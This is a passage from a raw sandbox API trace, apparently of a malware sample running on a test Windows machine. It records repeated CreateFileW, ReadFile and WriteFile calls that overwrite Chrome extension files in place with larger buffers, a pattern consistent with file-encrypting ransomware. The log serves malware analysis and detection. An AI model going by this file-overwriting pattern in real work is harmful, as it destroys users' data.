lpMultiByteStr=0x1f7344c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0168.463] ReadFile (in: hFile=0x1d8, lpBuffer=0x2893a98, nNumberOfBytesToRead=0x2c4, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2893a98*, lpNumberOfBytesRead=0x311f2bc*=0x2c4, lpOverlapped=0x0) returned 1 [0168.487] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0168.487] WriteFile (in: hFile=0x1d8, lpBuffer=0x2840958*, nNumberOfBytesToWrite=0x84c, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2840958*, lpNumberOfBytesWritten=0x311f2d0*=0x84c, lpOverlapped=0x0) returned 1 [0168.487] CloseHandle (hObject=0x1d8) returned 1 [0168.487] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lt\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lt\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0168.488] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0168.488] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x2ae [0168.488] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0168.488] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0168.488] ReleaseMutex (hMutex=0x168) returned 1 [0168.489] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0168.489] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7340c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0168.489] ReadFile (in: hFile=0x1d8, lpBuffer=0x2893a98, nNumberOfBytesToRead=0x2ae, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2893a98*, lpNumberOfBytesRead=0x311f2bc*=0x2ae, lpOverlapped=0x0) returned 1 [0168.490] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0168.490] WriteFile (in: hFile=0x1d8, lpBuffer=0x2840958*, nNumberOfBytesToWrite=0x836, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2840958*, lpNumberOfBytesWritten=0x311f2d0*=0x836, lpOverlapped=0x0) returned 1 [0168.491] CloseHandle (hObject=0x1d8) returned 1 [0168.491] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ru\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ru\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0168.492] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0168.492] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x30f [0168.492] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0168.492] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0168.492] ReleaseMutex (hMutex=0x168) returned 1 [0168.492] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0168.492] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7344c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0168.493] ReadFile (in: hFile=0x1d8, lpBuffer=0x2893a98, nNumberOfBytesToRead=0x30f, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2893a98*, lpNumberOfBytesRead=0x311f2bc*=0x30f, lpOverlapped=0x0) returned 1 [0168.503] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0168.503] WriteFile (in: hFile=0x1d8, lpBuffer=0x2840958*, nNumberOfBytesToWrite=0x897, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2840958*, lpNumberOfBytesWritten=0x311f2d0*=0x897, lpOverlapped=0x0) returned 1 [0168.503] CloseHandle (hObject=0x1d8) returned 1 [0168.503] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\vi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\vi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0168.504] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0168.504] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x2d0 [0168.504] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0168.504] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0168.505] ReleaseMutex (hMutex=0x168) returned 1 [0168.505] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0168.505] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7340c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0168.505] ReadFile (in: hFile=0x1d8, lpBuffer=0x2893a98, nNumberOfBytesToRead=0x2d0, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2893a98*, lpNumberOfBytesRead=0x311f2bc*=0x2d0, lpOverlapped=0x0) returned 1 [0168.508] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0168.508] WriteFile (in: hFile=0x1d8, lpBuffer=0x2840958*, nNumberOfBytesToWrite=0x858, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2840958*, lpNumberOfBytesWritten=0x311f2d0*=0x858, lpOverlapped=0x0) returned 1 [0168.508] CloseHandle (hObject=0x1d8) returned 1 [0168.508] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ca\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ca\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0168.509] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0168.510] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0xfe [0168.510] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0168.510] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0168.510] ReleaseMutex (hMutex=0x168) returned 1 [0168.510] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0168.510] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7344c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0168.510] ReadFile (in: hFile=0x1d8, lpBuffer=0x1eea538, nNumberOfBytesToRead=0xfe, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eea538*, lpNumberOfBytesRead=0x311f2bc*=0xfe, lpOverlapped=0x0) returned 1 [0168.511] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0168.511] WriteFile (in: hFile=0x1d8, lpBuffer=0x2840958*, nNumberOfBytesToWrite=0x686, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2840958*, lpNumberOfBytesWritten=0x311f2d0*=0x686, lpOverlapped=0x0) returned 1 [0168.511] CloseHandle (hObject=0x1d8) returned 1 [0168.512] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fil\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fil\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0168.512] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0168.512] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0xea [0168.513] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0168.513] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0168.513] ReleaseMutex (hMutex=0x168) returned 1 [0168.513] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0168.513] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7340c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0168.513] ReadFile (in: hFile=0x1d8, lpBuffer=0x1ea4ba8, nNumberOfBytesToRead=0xea, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ea4ba8*, lpNumberOfBytesRead=0x311f2bc*=0xea, lpOverlapped=0x0) returned 1 [0168.514] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0168.514] WriteFile (in: hFile=0x1d8, lpBuffer=0x2840958*, nNumberOfBytesToWrite=0x672, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2840958*, lpNumberOfBytesWritten=0x311f2d0*=0x672, lpOverlapped=0x0) returned 1 [0168.514] CloseHandle (hObject=0x1d8) returned 1 [0168.515] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ko\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ko\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0168.515] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0168.516] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x100 [0168.516] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0168.516] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0168.516] ReleaseMutex (hMutex=0x168) returned 1 [0168.516] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0168.516] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7344c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0168.516] ReadFile (in: hFile=0x1d8, lpBuffer=0x1eea538, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eea538*, lpNumberOfBytesRead=0x311f2bc*=0x100, lpOverlapped=0x0) returned 1 [0168.517] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0168.518] WriteFile (in: hFile=0x1d8, lpBuffer=0x2840958*, nNumberOfBytesToWrite=0x688, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2840958*, lpNumberOfBytesWritten=0x311f2d0*=0x688, lpOverlapped=0x0) returned 1 [0168.518] CloseHandle (hObject=0x1d8) returned 1 [0168.518] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ro\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ro\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0168.519] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0168.519] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x109 [0168.519] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0168.519] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0168.519] ReleaseMutex (hMutex=0x168) returned 1 [0168.520] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0168.520] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7340c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0168.520] ReadFile (in: hFile=0x1d8, lpBuffer=0x1ef1a78, nNumberOfBytesToRead=0x109, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ef1a78*, lpNumberOfBytesRead=0x311f2bc*=0x109, lpOverlapped=0x0) returned 1 [0168.521] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0168.521] WriteFile (in: hFile=0x1d8, lpBuffer=0x2840958*, nNumberOfBytesToWrite=0x691, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2840958*, lpNumberOfBytesWritten=0x311f2d0*=0x691, lpOverlapped=0x0) returned 1 [0168.521] CloseHandle (hObject=0x1d8) returned 1 [0168.521] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\uk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\uk\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0168.522] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0168.522] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x130 [0168.522] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0168.522] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0168.522] ReleaseMutex (hMutex=0x168) returned 1 [0168.522] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0168.522] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7344c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0168.522] ReadFile (in: hFile=0x1d8, lpBuffer=0x1f199a8, nNumberOfBytesToRead=0x130, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f199a8*, lpNumberOfBytesRead=0x311f2bc*=0x130, lpOverlapped=0x0) returned 1 [0168.523] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0168.523] WriteFile (in: hFile=0x1d8, lpBuffer=0x2840958*, nNumberOfBytesToWrite=0x6b8, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2840958*, lpNumberOfBytesWritten=0x311f2d0*=0x6b8, lpOverlapped=0x0) returned 1 [0168.524] CloseHandle (hObject=0x1d8) returned 1 [0168.524] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_route_details.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_route_details.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0168.524] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0169.827] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x111e1 [0169.827] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0169.827] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0169.827] ReleaseMutex (hMutex=0x168) returned 1 [0169.827] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="cast_route_details.html", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0169.827] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="cast_route_details.html", cchWideChar=23, lpMultiByteStr=0x1f88bcc, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cast_route_details.html", lpUsedDefaultChar=0x0) returned 23 [0169.828] ReadFile (in: hFile=0x1d8, lpBuffer=0x2840938, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2840938*, lpNumberOfBytesRead=0x311f278*=0x4000, lpOverlapped=0x0) returned 1 [0169.829] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x101e1 [0169.830] ReadFile (in: hFile=0x1d8, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0169.830] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x101e1 [0169.831] WriteFile (in: hFile=0x1d8, lpBuffer=0x289d9d8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x289d9d8*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0169.831] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0169.831] WriteFile (in: hFile=0x1d8, lpBuffer=0x2844968*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2844968*, lpNumberOfBytesWritten=0x311f28c*=0x4000, lpOverlapped=0x0) returned 1 [0169.831] CloseHandle (hObject=0x1d8) returned 1 [0169.832] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\index.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\index.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0169.834] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0169.834] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, 